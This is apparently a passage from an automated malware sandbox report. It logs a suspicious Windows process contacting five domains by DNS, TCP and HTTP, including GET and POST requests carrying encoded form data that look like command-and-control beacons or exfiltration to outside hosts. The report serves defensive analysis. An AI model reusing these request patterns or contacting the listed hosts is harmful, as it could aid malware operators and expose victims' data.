                                                  Nov 19, 2024 03:56:52.688481092 CET4998580192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:52.700404882 CET4998580192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:52.705466986 CET8049985203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:52.705501080 CET8049985203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:52.705555916 CET8049985203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:52.705585957 CET8049985203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:52.705637932 CET8049985203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:52.705666065 CET8049985203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:52.705694914 CET8049985203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:52.705760956 CET8049985203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:52.705790043 CET8049985203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:53.471395969 CET8049985203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:53.471466064 CET8049985203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:53.471503973 CET8049985203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:53.471522093 CET4998580192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:53.471539974 CET8049985203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:53.471579075 CET8049985203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:53.471594095 CET4998580192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:53.471724987 CET8049985203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:53.471760035 CET8049985203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:53.471769094 CET4998580192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:53.471813917 CET8049985203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:53.471879959 CET4998580192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:53.472039938 CET8049985203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:53.472073078 CET8049985203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:53.472121000 CET4998580192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:53.476603031 CET8049985203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:53.476643085 CET8049985203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:53.476679087 CET8049985203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:53.476695061 CET4998580192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:53.476716042 CET8049985203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:53.476764917 CET4998580192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:53.484860897 CET8049985203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:53.484924078 CET4998580192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:54.212269068 CET4998580192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:55.230694056 CET4999780192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:55.235590935 CET8049997203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:55.235702038 CET4999780192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:55.242980957 CET4999780192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:55.247910023 CET8049997203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:56.011625051 CET8049997203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:56.011704922 CET8049997203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:56.011743069 CET8049997203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:56.011765957 CET4999780192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:56.011780024 CET8049997203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:56.011816025 CET8049997203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:56.011848927 CET8049997203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:56.011881113 CET4999780192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:56.011890888 CET8049997203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:56.011907101 CET4999780192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:56.011926889 CET8049997203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:56.011957884 CET8049997203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:56.011971951 CET4999780192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:56.011995077 CET8049997203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:56.012042999 CET4999780192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:56.017157078 CET8049997203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:56.017214060 CET8049997203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:56.017256021 CET8049997203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:56.017275095 CET4999780192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:56.017292023 CET8049997203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:56.017333984 CET8049997203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:56.017415047 CET4999780192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:56.024879932 CET8049997203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:56.025158882 CET4999780192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:56.026058912 CET4999780192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:56.031351089 CET8049997203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:57:01.265948057 CET5001680192.168.2.491.226.30.3
                                                  Nov 19, 2024 03:57:01.271006107 CET805001691.226.30.3192.168.2.4
                                                  Nov 19, 2024 03:57:01.271212101 CET5001680192.168.2.491.226.30.3
                                                  Nov 19, 2024 03:57:01.284641027 CET5001680192.168.2.491.226.30.3
                                                  Nov 19, 2024 03:57:01.289735079 CET805001691.226.30.3192.168.2.4
                                                  Nov 19, 2024 03:57:02.790158033 CET5001680192.168.2.491.226.30.3
                                                  Nov 19, 2024 03:57:02.796082973 CET805001691.226.30.3192.168.2.4
                                                  Nov 19, 2024 03:57:02.796185970 CET5001680192.168.2.491.226.30.3
                                                  Nov 19, 2024 03:57:03.838555098 CET5001780192.168.2.491.226.30.3
                                                  Nov 19, 2024 03:57:03.843786001 CET805001791.226.30.3192.168.2.4
                                                  Nov 19, 2024 03:57:03.843873024 CET5001780192.168.2.491.226.30.3
                                                  Nov 19, 2024 03:57:03.862509012 CET5001780192.168.2.491.226.30.3
                                                  Nov 19, 2024 03:57:03.867669106 CET805001791.226.30.3192.168.2.4
                                                  Nov 19, 2024 03:57:04.996793985 CET805001791.226.30.3192.168.2.4
                                                  Nov 19, 2024 03:57:04.996898890 CET5001780192.168.2.491.226.30.3
                                                  Nov 19, 2024 03:57:05.368311882 CET5001780192.168.2.491.226.30.3
                                                  Nov 19, 2024 03:57:05.373461962 CET805001791.226.30.3192.168.2.4
                                                  Nov 19, 2024 03:57:06.386846066 CET5001880192.168.2.491.226.30.3
                                                  Nov 19, 2024 03:57:06.392020941 CET805001891.226.30.3192.168.2.4
                                                  Nov 19, 2024 03:57:06.392118931 CET5001880192.168.2.491.226.30.3
                                                  Nov 19, 2024 03:57:06.409358025 CET5001880192.168.2.491.226.30.3
                                                  Nov 19, 2024 03:57:06.414356947 CET805001891.226.30.3192.168.2.4
                                                  Nov 19, 2024 03:57:06.414421082 CET805001891.226.30.3192.168.2.4
                                                  Nov 19, 2024 03:57:06.414509058 CET805001891.226.30.3192.168.2.4
                                                  Nov 19, 2024 03:57:06.414541006 CET805001891.226.30.3192.168.2.4
                                                  Nov 19, 2024 03:57:06.414570093 CET805001891.226.30.3192.168.2.4
                                                  Nov 19, 2024 03:57:06.414624929 CET805001891.226.30.3192.168.2.4
                                                  Nov 19, 2024 03:57:06.414654016 CET805001891.226.30.3192.168.2.4
                                                  Nov 19, 2024 03:57:06.414684057 CET805001891.226.30.3192.168.2.4
                                                  Nov 19, 2024 03:57:06.414712906 CET805001891.226.30.3192.168.2.4
                                                  Nov 19, 2024 03:57:07.534674883 CET805001891.226.30.3192.168.2.4
                                                  Nov 19, 2024 03:57:07.534811020 CET805001891.226.30.3192.168.2.4
                                                  Nov 19, 2024 03:57:07.534888983 CET5001880192.168.2.491.226.30.3
                                                  Nov 19, 2024 03:57:07.783540010 CET805001891.226.30.3192.168.2.4
                                                  Nov 19, 2024 03:57:07.783727884 CET5001880192.168.2.491.226.30.3
                                                  Nov 19, 2024 03:57:07.915247917 CET5001880192.168.2.491.226.30.3
                                                  Nov 19, 2024 03:57:08.933742046 CET5001980192.168.2.491.226.30.3
                                                  Nov 19, 2024 03:57:08.938788891 CET805001991.226.30.3192.168.2.4
                                                  Nov 19, 2024 03:57:08.938864946 CET5001980192.168.2.491.226.30.3
                                                  Nov 19, 2024 03:57:08.949137926 CET5001980192.168.2.491.226.30.3
                                                  Nov 19, 2024 03:57:08.954013109 CET805001991.226.30.3192.168.2.4
                                                  Nov 19, 2024 03:57:10.092542887 CET805001991.226.30.3192.168.2.4
                                                  Nov 19, 2024 03:57:10.092669010 CET5001980192.168.2.491.226.30.3
                                                  Nov 19, 2024 03:57:10.093584061 CET5001980192.168.2.491.226.30.3
                                                  Nov 19, 2024 03:57:10.098436117 CET805001991.226.30.3192.168.2.4
                                                  Nov 19, 2024 03:57:15.153678894 CET5002080192.168.2.4104.21.15.100
                                                  Nov 19, 2024 03:57:15.158621073 CET8050020104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:15.158694029 CET5002080192.168.2.4104.21.15.100
                                                  Nov 19, 2024 03:57:15.172544956 CET5002080192.168.2.4104.21.15.100
                                                  Nov 19, 2024 03:57:15.177493095 CET8050020104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:16.067656040 CET8050020104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:16.067678928 CET8050020104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:16.067744017 CET5002080192.168.2.4104.21.15.100
                                                  Nov 19, 2024 03:57:16.071116924 CET8050020104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:16.071167946 CET5002080192.168.2.4104.21.15.100
                                                  Nov 19, 2024 03:57:16.680854082 CET5002080192.168.2.4104.21.15.100
                                                  Nov 19, 2024 03:57:17.709661961 CET5002180192.168.2.4104.21.15.100
                                                  Nov 19, 2024 03:57:17.714771986 CET8050021104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:17.714891911 CET5002180192.168.2.4104.21.15.100
                                                  Nov 19, 2024 03:57:17.729649067 CET5002180192.168.2.4104.21.15.100
                                                  Nov 19, 2024 03:57:17.734500885 CET8050021104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:18.626359940 CET8050021104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:18.626379013 CET8050021104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:18.626444101 CET5002180192.168.2.4104.21.15.100
                                                  Nov 19, 2024 03:57:18.627831936 CET8050021104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:18.627876997 CET5002180192.168.2.4104.21.15.100
                                                  Nov 19, 2024 03:57:19.634103060 CET5002180192.168.2.4104.21.15.100
                                                  Nov 19, 2024 03:57:20.652458906 CET5002280192.168.2.4104.21.15.100
                                                  Nov 19, 2024 03:57:20.658215046 CET8050022104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:20.658313990 CET5002280192.168.2.4104.21.15.100
                                                  Nov 19, 2024 03:57:20.672945023 CET5002280192.168.2.4104.21.15.100
                                                  Nov 19, 2024 03:57:20.677867889 CET8050022104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:20.677877903 CET8050022104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:20.677920103 CET8050022104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:20.677934885 CET8050022104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:20.678020000 CET8050022104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:20.678029060 CET8050022104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:20.678033113 CET8050022104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:20.678045034 CET8050022104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:20.678049088 CET8050022104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:21.584063053 CET8050022104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:21.584112883 CET8050022104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:21.584196091 CET5002280192.168.2.4104.21.15.100
                                                  Nov 19, 2024 03:57:21.586263895 CET8050022104.21.15.100192.168.2.4
                                                  Nov 19, 2024 03:57:21.586340904 CET5002280192.168.2.4104.21.15.100

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Nov 19, 2024 03:56:16.238821030 CET5549653192.168.2.41.1.1.1
                                                  Nov 19, 2024 03:56:16.275840044 CET53554961.1.1.1192.168.2.4
                                                  Nov 19, 2024 03:56:32.638467073 CET5316153192.168.2.41.1.1.1
                                                  Nov 19, 2024 03:56:32.666285992 CET53531611.1.1.1192.168.2.4
                                                  Nov 19, 2024 03:56:47.027966022 CET5537953192.168.2.41.1.1.1
                                                  Nov 19, 2024 03:56:47.587869883 CET53553791.1.1.1192.168.2.4
                                                  Nov 19, 2024 03:57:01.042840958 CET6216653192.168.2.41.1.1.1
                                                  Nov 19, 2024 03:57:01.262706041 CET53621661.1.1.1192.168.2.4
                                                  Nov 19, 2024 03:57:15.106306076 CET5199953192.168.2.41.1.1.1
                                                  Nov 19, 2024 03:57:15.151463985 CET53519991.1.1.1192.168.2.4

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Nov 19, 2024 03:56:16.238821030 CET192.168.2.41.1.1.10x507fStandard query (0)www.tempatmudisini06.clickA (IP address)IN (0x0001)false
                                                  Nov 19, 2024 03:56:32.638467073 CET192.168.2.41.1.1.10x76ccStandard query (0)www.carsten.studioA (IP address)IN (0x0001)false
                                                  Nov 19, 2024 03:56:47.027966022 CET192.168.2.41.1.1.10xcf31Standard query (0)www.moumore.topA (IP address)IN (0x0001)false
                                                  Nov 19, 2024 03:57:01.042840958 CET192.168.2.41.1.1.10xef13Standard query (0)www.vpnto.netA (IP address)IN (0x0001)false
                                                  Nov 19, 2024 03:57:15.106306076 CET192.168.2.41.1.1.10x42e5Standard query (0)www.sitioseguro.blogA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Nov 19, 2024 03:56:16.275840044 CET1.1.1.1192.168.2.40x507fNo error (0)www.tempatmudisini06.clicktempatmudisini06.clickCNAME (Canonical name)IN (0x0001)false
                                                  Nov 19, 2024 03:56:16.275840044 CET1.1.1.1192.168.2.40x507fNo error (0)tempatmudisini06.click103.21.221.4A (IP address)IN (0x0001)false
                                                  Nov 19, 2024 03:56:32.666285992 CET1.1.1.1192.168.2.40x76ccNo error (0)www.carsten.studiocarsten.studioCNAME (Canonical name)IN (0x0001)false
                                                  Nov 19, 2024 03:56:32.666285992 CET1.1.1.1192.168.2.40x76ccNo error (0)carsten.studio217.160.0.200A (IP address)IN (0x0001)false
                                                  Nov 19, 2024 03:56:47.587869883 CET1.1.1.1192.168.2.40xcf31No error (0)www.moumore.top203.161.46.205A (IP address)IN (0x0001)false
                                                  Nov 19, 2024 03:57:01.262706041 CET1.1.1.1192.168.2.40xef13No error (0)www.vpnto.net91.226.30.3A (IP address)IN (0x0001)false
                                                  Nov 19, 2024 03:57:15.151463985 CET1.1.1.1192.168.2.40x42e5No error (0)www.sitioseguro.blog104.21.15.100A (IP address)IN (0x0001)false
                                                  Nov 19, 2024 03:57:15.151463985 CET1.1.1.1192.168.2.40x42e5No error (0)www.sitioseguro.blog172.67.162.39A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • www.tempatmudisini06.click
                                                  • www.carsten.studio
                                                  • www.moumore.top
                                                  • www.vpnto.net
                                                  • www.sitioseguro.blog

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.449815103.21.221.4804628C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 19, 2024 03:56:16.294245005 CET472OUTGET /5jq3/?AjEdl=yJNdk0d&5lf8fv8H=yIj9FEq6F0t9Cr9krCaOZjvPrwz7BUN2KJdByNXo/qcAvamNSMMSktux9ZEHvDPxROSkUK3HLwPZkwRHUMJC19uHNEPIeSAiG60jprZNGQbwC+UuOuY/6g8= HTTP/1.1
                                                  Host: www.tempatmudisini06.click
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-us
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                  Nov 19, 2024 03:56:17.406595945 CET1033INHTTP/1.1 404 Not Found
                                                  Connection: close
                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                  pragma: no-cache
                                                  content-type: text/html
                                                  content-length: 796
                                                  date: Tue, 19 Nov 2024 02:56:17 GMT
                                                  server: LiteSpeed
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.449890217.160.0.200804628C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 19, 2024 03:56:32.816982985 CET730OUTPOST /bdk6/ HTTP/1.1
                                                  Host: www.carsten.studio
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate
                                                  Accept-Language: en-us
                                                  Connection: close
                                                  Content-Length: 205
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.carsten.studio
                                                  Referer: http://www.carsten.studio/bdk6/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                  Data Raw: 35 6c 66 38 66 76 38 48 3d 43 6f 43 68 53 4f 4e 30 4c 30 36 4a 5a 46 4b 42 70 61 6a 66 62 30 32 46 2f 50 2b 6b 54 6b 53 74 44 55 45 44 4a 33 51 61 44 6b 2f 47 54 50 32 6f 38 76 36 33 66 45 34 64 33 56 42 65 77 67 36 59 4c 54 77 36 36 52 44 44 54 38 76 78 78 72 6d 45 74 75 65 4e 5a 65 2f 50 6d 46 76 4c 66 50 52 34 33 38 63 67 46 79 77 78 36 69 70 4d 50 38 50 32 33 63 71 4e 34 70 75 4e 46 50 78 31 42 65 34 48 55 70 70 73 70 68 36 61 57 70 71 4a 33 53 4a 41 36 72 4b 51 61 4e 51 66 69 6e 5a 63 57 4c 54 30 70 54 68 2b 47 59 31 31 4c 5a 51 42 34 59 4b 69 4d 49 70 58 47 6a 32 2b 63 6b 61 59 62 69 63 71 4f 51 3d 3d
                                                  Data Ascii: 5lf8fv8H=CoChSON0L06JZFKBpajfb02F/P+kTkStDUEDJ3QaDk/GTP2o8v63fE4d3VBewg6YLTw66RDDT8vxxrmEtueNZe/PmFvLfPR438cgFywx6ipMP8P23cqN4puNFPx1Be4HUppsph6aWpqJ3SJA6rKQaNQfinZcWLT0pTh+GY11LZQB4YKiMIpXGj2+ckaYbicqOQ==


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.449903217.160.0.200804628C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 19, 2024 03:56:35.374742031 CET750OUTPOST /bdk6/ HTTP/1.1
                                                  Host: www.carsten.studio
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate
                                                  Accept-Language: en-us
                                                  Connection: close
                                                  Content-Length: 225
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.carsten.studio
                                                  Referer: http://www.carsten.studio/bdk6/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                  Data Raw: 35 6c 66 38 66 76 38 48 3d 43 6f 43 68 53 4f 4e 30 4c 30 36 4a 57 45 36 42 71 35 4c 66 54 30 32 43 7a 76 2b 6b 64 45 53 70 44 55 34 44 4a 79 6f 4b 44 32 72 47 51 71 53 6f 39 75 36 33 63 45 34 64 38 31 42 62 2f 41 36 44 4c 54 38 79 36 52 50 44 54 38 37 78 78 71 57 45 74 64 32 4f 62 4f 2f 4a 6e 31 76 4e 51 76 52 34 33 38 63 67 46 79 55 4c 36 69 68 4d 49 50 6e 32 32 2b 43 43 32 4a 75 4b 55 50 78 31 46 65 34 44 55 70 6f 42 70 67 6d 67 57 71 43 4a 33 58 4e 41 6a 61 4b 66 44 64 51 5a 6d 6e 59 43 58 4b 2f 38 6e 44 45 78 49 37 78 76 49 62 45 32 35 65 48 34 64 35 49 41 55 6a 53 4e 42 6a 54 73 57 68 68 6a 56 64 68 72 38 55 61 47 65 6e 64 6d 47 4a 4b 35 47 30 42 34 58 72 30 3d
                                                  Data Ascii: 5lf8fv8H=CoChSON0L06JWE6Bq5LfT02Czv+kdESpDU4DJyoKD2rGQqSo9u63cE4d81Bb/A6DLT8y6RPDT87xxqWEtd2ObO/Jn1vNQvR438cgFyUL6ihMIPn22+CC2JuKUPx1Fe4DUpoBpgmgWqCJ3XNAjaKfDdQZmnYCXK/8nDExI7xvIbE25eH4d5IAUjSNBjTsWhhjVdhr8UaGendmGJK5G0B4Xr0=


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.449914217.160.0.200804628C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 19, 2024 03:56:37.921024084 CET10832OUTPOST /bdk6/ HTTP/1.1
                                                  Host: www.carsten.studio
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate
                                                  Accept-Language: en-us
                                                  Connection: close
                                                  Content-Length: 10305
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.carsten.studio
                                                  Referer: http://www.carsten.studio/bdk6/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                  Data Raw: 35 6c 66 38 66 76 38 48 3d 43 6f 43 68 53 4f 4e 30 4c 30 36 4a 57 45 36 42 71 35 4c 66 54 30 32 43 7a 76 2b 6b 64 45 53 70 44 55 34 44 4a 79 6f 4b 44 33 54 47 54 5a 71 6f 38 4e 53 33 64 45 34 64 69 46 42 61 2f 41 37 42 4c 54 30 32 36 52 53 2b 54 2b 44 78 6a 63 71 45 38 38 32 4f 52 4f 2f 4a 73 56 76 49 66 50 51 67 33 38 73 6b 46 79 6b 4c 36 69 68 4d 49 4a 62 32 31 73 71 43 37 70 75 4e 46 50 78 78 42 65 34 37 55 70 51 2f 70 67 6a 64 57 61 69 4a 33 33 64 41 68 49 53 66 4c 64 51 62 72 48 59 4b 58 4b 79 69 6e 44 59 54 49 34 74 52 49 5a 59 32 37 61 66 6b 47 4a 59 57 41 31 36 67 52 51 6e 79 61 54 74 2f 62 74 35 4f 74 6b 44 47 4d 57 52 72 64 37 76 52 52 30 68 75 4a 38 67 32 4f 64 48 4e 51 49 33 2f 46 6f 42 46 67 59 70 66 57 56 37 4f 34 6f 76 67 51 71 35 51 62 63 59 34 6e 64 35 71 69 6f 6a 48 73 70 42 70 4b 63 78 32 44 76 41 4f 37 78 67 7a 65 76 46 57 39 48 52 75 47 4d 4e 72 30 39 56 6b 45 49 73 2f 50 30 33 31 61 35 4e 56 63 45 52 2f 57 6b 44 63 4c 68 6e 54 51 78 76 49 77 77 61 69 31 78 6b 37 2b 57 53 46 4b [TRUNCATED]
                                                  Data Ascii: 5lf8fv8H=CoChSON0L06JWE6Bq5LfT02Czv+kdESpDU4DJyoKD3TGTZqo8NS3dE4diFBa/A7BLT026RS+T+DxjcqE882ORO/JsVvIfPQg38skFykL6ihMIJb21sqC7puNFPxxBe47UpQ/pgjdWaiJ33dAhISfLdQbrHYKXKyinDYTI4tRIZY27afkGJYWA16gRQnyaTt/bt5OtkDGMWRrd7vRR0huJ8g2OdHNQI3/FoBFgYpfWV7O4ovgQq5QbcY4nd5qiojHspBpKcx2DvAO7xgzevFW9HRuGMNr09VkEIs/P031a5NVcER/WkDcLhnTQxvIwwai1xk7+WSFKEr0/Vps7Ma83D5te/ZrCuRNAQrarLTIt8vAQVLVAwPd+yoNpjAXFlhNT9LK4K/8yLqVFgsEWDdEss9iSVOIe/V1NNoHaid/KL8Ju75Fz/jyfQ3CSzz2EtAmE/XryjNq67rmPI6PlA0Fqacx9MPDhZkXqjwBWj3RfvtBq3ATmrLUgAMtfOja2m2Ta9yfm5SFk2ybckJCfaODLMfT4zoqUrm1XtpNBjjmpmuzm3Rw/5fjtKlC4ydCRk3HFNKXbCfP+39b9BzQ6o6fghGFZPkVxkZTa9H+748Lf4gTFwrZ0mGv08guH68JEWPfb7LLYiM6LJXU3sSd2M5IhI0RZ09Yfe1cAZPMfMKLU3FWAeuuADMH1z14gKbDxr7YF3JhAPCgymYsQD+tf40nlTSHhhvpa2ab2pfSoCbXU2emEJEXENlaeHWQnP1M0aIXMV1R504ZIQeXD3nle+Ts28LzJm+DXbMs/57gvVCGFSX75v54G+yjLKfXYykM47T7FgJMstgmPaLdLdPVSNwdrmDQylh+KY3N3k6F0BPaMOdsaTGxj4lzYnF4RnRVYJEdr1kq/TD+T/57PAW2BJ0EhGCYdOq7pR2ixiiioobUTFxY+R+uxp3ltSsms61WsTNYpYgzGJsowI+JbEaDHVOlRYy99Q7u8Z8pb7N+CqqUcRq [TRUNCATED]


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.449927217.160.0.200804628C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe
                                                  TimestampBytes transferredDirectionData
